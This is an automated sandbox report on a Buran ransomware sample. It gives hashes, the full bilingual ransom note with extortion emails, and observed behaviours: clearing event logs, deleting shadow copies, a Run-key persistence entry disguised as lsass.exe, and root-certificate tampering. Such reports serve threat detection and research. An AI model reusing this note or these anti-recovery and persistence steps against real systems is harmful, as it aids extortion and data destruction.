buran | 97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

Analysis

max time kernel
145s
max time network
125s
platform
windows7_x64
resource
win7-20220718-en
resource tags

arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
submitted
24-07-2022 15:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe
Size

624KB
MD5

e2c9e21bc2d59273ad13144b10e082f8
SHA1

0fd4b5d955122d84552626d2634c62c78e800b7c
SHA256

97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433
SHA512

393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Score

10^/10

buran evasion persistence ransomware suricata

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

==== GERMAN ==== Alle Ihre Dateien, Dokumente, Fotos, Datenbanken und andere wichtige Dateien werden verschlusselt. Sie konnen es nicht selbst entschlusseln! Die einzige Methode Zum Wiederherstellen von Dateien muss ein eindeutiger privater Schlussel erworben werden. Nur wir konnen Ihnen diesen Schlussel geben und nur wir konnen Ihre Dateien wiederherstellen. Um sicher zu gehen, dass wir den Entschlusseler haben und er funktioniert, konnen Sie einen senden Senden Sie eine E-Mail an [email protected] oder [email protected] und entschlusseln Sie eine Datei kostenlos. Aber diese Datei sollte nicht wertvoll sein! Mochten Sie Ihre Dateien wirklich wiederherstellen? Schreiben Sie eine E-Mail an [email protected] [email protected] (reservieren) Ihre personliche ID: <! - ID -> Beachtung! * Benennen Sie verschlusselte Dateien nicht um. * Versuchen Sie nicht, Ihre Daten mit Software von Drittanbietern zu entschlusseln. Dies kann zu dauerhaftem Datenverlust fuhren. * Entschlusselung Ihrer Dateien mit Hilfe von Dritten moglich verursachen Sie erhohten Preis (sie addieren ihre Gebuhr zu unserem) oder Sie konnen Opfer eines Betrugs werden. ==== ENGLISH ==== All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email [email protected] or [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email [email protected] [email protected] (reserve) Your personal ID: 10E7C7CA-9904-A917-933F-8A002BB7B478 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

[email protected]

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
suricata: ET MALWARE Buran Ransomware Activity M1
suricata: ET MALWARE Buran Ransomware Activity M1
suricata
suricata: ET MALWARE Observed Buran Ransomware UA (BURAN)
suricata: ET MALWARE Observed Buran Ransomware UA (BURAN)
suricata

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
1068	wevtutil.exe
436	wevtutil.exe
952	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 4 IoCs

pid	Process
1552	lsass.exe
588	lsass.exe
1752	lsass.exe
1052	lsass.exe

Deletes itself 1 IoCs

pid	Process
684	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe
540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Windows\CurrentVersion\Run\Local Security Authority Subsystem Service = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"	reg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	lsass.exe
File opened (read-only)	\??\X:	lsass.exe
File opened (read-only)	\??\W:	lsass.exe
File opened (read-only)	\??\S:	lsass.exe
File opened (read-only)	\??\R:	lsass.exe
File opened (read-only)	\??\O:	lsass.exe
File opened (read-only)	\??\M:	lsass.exe
File opened (read-only)	\??\I:	lsass.exe
File opened (read-only)	\??\E:	lsass.exe
File opened (read-only)	\??\Y:	lsass.exe
File opened (read-only)	\??\V:	lsass.exe
File opened (read-only)	\??\U:	lsass.exe
File opened (read-only)	\??\T:	lsass.exe
File opened (read-only)	\??\L:	lsass.exe
File opened (read-only)	\??\K:	lsass.exe
File opened (read-only)	\??\J:	lsass.exe
File opened (read-only)	\??\F:	lsass.exe
File opened (read-only)	\??\A:	lsass.exe
File opened (read-only)	\??\Q:	lsass.exe
File opened (read-only)	\??\P:	lsass.exe
File opened (read-only)	\??\N:	lsass.exe
File opened (read-only)	\??\H:	lsass.exe
File opened (read-only)	\??\G:	lsass.exe
File opened (read-only)	\??\B:	lsass.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	geoiptool.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\UTC.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87	lsass.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files\UseConvertTo.odp.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Lagos.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\en-US\Solitaire.exe.mui.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html	lsass.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\de-DE\FreeCell.exe.mui	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\meta-index	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Gaza.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-execution.xml_hidden	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01630_.WMF.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\ShvlRes.dll.mui	lsass.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml	lsass.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\ChkrRes.dll.mui.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Australia\Hobart	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\LICENSE.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\jni.h.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties.[10E7C7CA-9904-A917-933F-8A002BB7B478]	lsass.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
656	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
868	vssadmin.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	lsass.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	lsass.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1700	PING.EXE

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	1552	lsass.exe
Token: SeIncreaseQuotaPrivilege	636	WMIC.exe
Token: SeSecurityPrivilege	636	WMIC.exe
Token: SeTakeOwnershipPrivilege	636	WMIC.exe
Token: SeLoadDriverPrivilege	636	WMIC.exe
Token: SeSystemProfilePrivilege	636	WMIC.exe
Token: SeSystemtimePrivilege	636	WMIC.exe
Token: SeProfSingleProcessPrivilege	636	WMIC.exe
Token: SeIncBasePriorityPrivilege	636	WMIC.exe
Token: SeCreatePagefilePrivilege	636	WMIC.exe
Token: SeBackupPrivilege	636	WMIC.exe
Token: SeRestorePrivilege	636	WMIC.exe
Token: SeShutdownPrivilege	636	WMIC.exe
Token: SeDebugPrivilege	636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	636	WMIC.exe
Token: SeRemoteShutdownPrivilege	636	WMIC.exe
Token: SeUndockPrivilege	636	WMIC.exe
Token: SeManageVolumePrivilege	636	WMIC.exe
Token: 33	636	WMIC.exe
Token: 34	636	WMIC.exe
Token: 35	636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	636	WMIC.exe
Token: SeSecurityPrivilege	636	WMIC.exe
Token: SeTakeOwnershipPrivilege	636	WMIC.exe
Token: SeLoadDriverPrivilege	636	WMIC.exe
Token: SeSystemProfilePrivilege	636	WMIC.exe
Token: SeSystemtimePrivilege	636	WMIC.exe
Token: SeProfSingleProcessPrivilege	636	WMIC.exe
Token: SeIncBasePriorityPrivilege	636	WMIC.exe
Token: SeCreatePagefilePrivilege	636	WMIC.exe
Token: SeBackupPrivilege	636	WMIC.exe
Token: SeRestorePrivilege	636	WMIC.exe
Token: SeShutdownPrivilege	636	WMIC.exe
Token: SeDebugPrivilege	636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	636	WMIC.exe
Token: SeRemoteShutdownPrivilege	636	WMIC.exe
Token: SeUndockPrivilege	636	WMIC.exe
Token: SeManageVolumePrivilege	636	WMIC.exe
Token: 33	636	WMIC.exe
Token: 34	636	WMIC.exe
Token: 35	636	WMIC.exe
Token: SeBackupPrivilege	1832	vssvc.exe
Token: SeRestorePrivilege	1832	vssvc.exe
Token: SeAuditPrivilege	1832	vssvc.exe
Token: SeSecurityPrivilege	1068	wevtutil.exe
Token: SeBackupPrivilege	1068	wevtutil.exe
Token: SeSecurityPrivilege	436	wevtutil.exe
Token: SeBackupPrivilege	436	wevtutil.exe
Token: SeSecurityPrivilege	952	wevtutil.exe
Token: SeBackupPrivilege	952	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 540 wrote to memory of 1468	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	30
PID 540 wrote to memory of 1468	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	30
PID 540 wrote to memory of 1468	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	30
PID 540 wrote to memory of 1468	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	30
PID 1468 wrote to memory of 1496	1468	cmd.exe	32
PID 1468 wrote to memory of 1496	1468	cmd.exe	32
PID 1468 wrote to memory of 1496	1468	cmd.exe	32
PID 1468 wrote to memory of 1496	1468	cmd.exe	32
PID 540 wrote to memory of 1552	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	33
PID 540 wrote to memory of 1552	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	33
PID 540 wrote to memory of 1552	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	33
PID 540 wrote to memory of 1552	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	33
PID 540 wrote to memory of 684	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	34
